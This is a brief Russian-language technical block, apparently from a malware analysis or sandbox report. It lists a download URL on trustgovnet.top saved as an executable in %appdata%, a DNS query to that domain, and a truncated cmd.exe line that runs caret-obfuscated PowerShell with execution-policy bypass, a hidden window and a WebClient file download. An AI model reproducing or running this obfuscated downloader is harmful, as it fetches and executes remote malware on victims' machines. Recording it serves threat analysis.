Техническая информация
- http://trustgovnet.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "poWErSH^e^l^l^.eXE^ ^-^eXECU^t^i^On^po^LICY byPA^s^s ^-^No^prOf^ilE^ -w^InDOw^s^t^ylE Hi^d^dE^N ^(NEW-^obje^ct^ syS^te^M.^N^ET.WeBclI^ENT)^.^D^o^Wnl^o^AD^FiLe^('http://tru...
- DNS ASK tr###govnet.top
- '<SYSTEM32>\cmd.exe' /C "poWErSH^e^l^l^.eXE^ ^-^eXECU^t^i^On^po^LICY byPA^s^s ^-^No^prOf^ilE^ -w^InDOw^s^t^ylE Hi^d^dE^N ^(NEW-^obje^ct^ syS^te^M.^N^ET.WeBclI^ENT)^.^D^o^Wnl^o^AD^FiLe^('http://tru...' (со скрытым окном)